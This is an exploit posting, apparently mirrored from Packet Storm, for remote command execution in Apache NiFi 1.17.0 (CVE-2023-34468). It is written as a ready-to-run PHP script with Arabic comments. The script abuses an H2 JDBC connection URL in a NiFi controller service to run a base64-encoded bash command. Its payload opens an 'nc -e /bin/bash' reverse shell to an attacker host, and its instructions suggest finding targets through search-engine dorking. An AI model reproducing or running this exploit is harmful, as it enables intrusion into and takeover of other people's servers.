Share
## https://sploitus.com/exploit?id=PACKETSTORM:189686
=============================================================================================================================================
| # Title : Apache NiFi 1.17.0 RCE Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://nifi.apache.org/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: exploit remote command execution vulnerability in Apache NiFi
(Related : https://packetstorm.news/files/id/174398/ Related CVE numbers: CVE-2023-34468 ) .
[+] save code as poc.php.
[+] Set TArget : line 61 + 62
[+] PayLoad :
<?php
// سكربت لاستغلال ثغرة تنفيذ الأوامر عن بُعد في Apache NiFi
class ApacheNiFiExploit {
private $target;
private $token;
public function __construct($target, $token = null) {
$this->target = rtrim($target, '/');
$this->token = $token;
}
private function sendRequest($endpoint, $method = 'GET', $data = null) {
$url = "$this->target/$endpoint";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($this->token) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Authorization: Bearer $this->token"]);
}
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array_merge([
'Content-Type: application/json'
], $this->token ? ["Authorization: Bearer $this->token"] : []));
}
$response = curl_exec($ch);
curl_close($ch);
return json_decode($response, true);
}
public function exploit($payload) {
$b64_payload = base64_encode($payload);
$db_name = bin2hex(random_bytes(4));
$trigger_name = strtoupper(bin2hex(random_bytes(4)));
$db_config = [
'component' => [
'name' => 'ExploitDBPool',
'properties' => [
'Database Connection URL' => "jdbc:h2:file:/tmp/$db_name.db;CREATE TRIGGER $trigger_name BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,$b64_payload}|{base64,-d}|{bash,-i}')\n$$--=x",
'Database Driver Class Name' => 'org.h2.Driver'
]
]
];
$response = $this->sendRequest('nifi-api/controller-services', 'POST', $db_config);
if (isset($response['component']['id'])) {
echo "[+] تم إنشاء واستغلال خدمة الاتصال بقاعدة البيانات بنجاح!";
} else {
echo "[-] فشل في تنفيذ الهجوم.";
}
}
}
$target = 'https://target-nifi-instance.com';
$token = 'YOUR_BEARER_TOKEN'; // إذا كانت المصادقة مطلوبة
$exploit = new ApacheNiFiExploit($target, $token);
$exploit->exploit('nc -e /bin/bash attacker-ip 4444');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================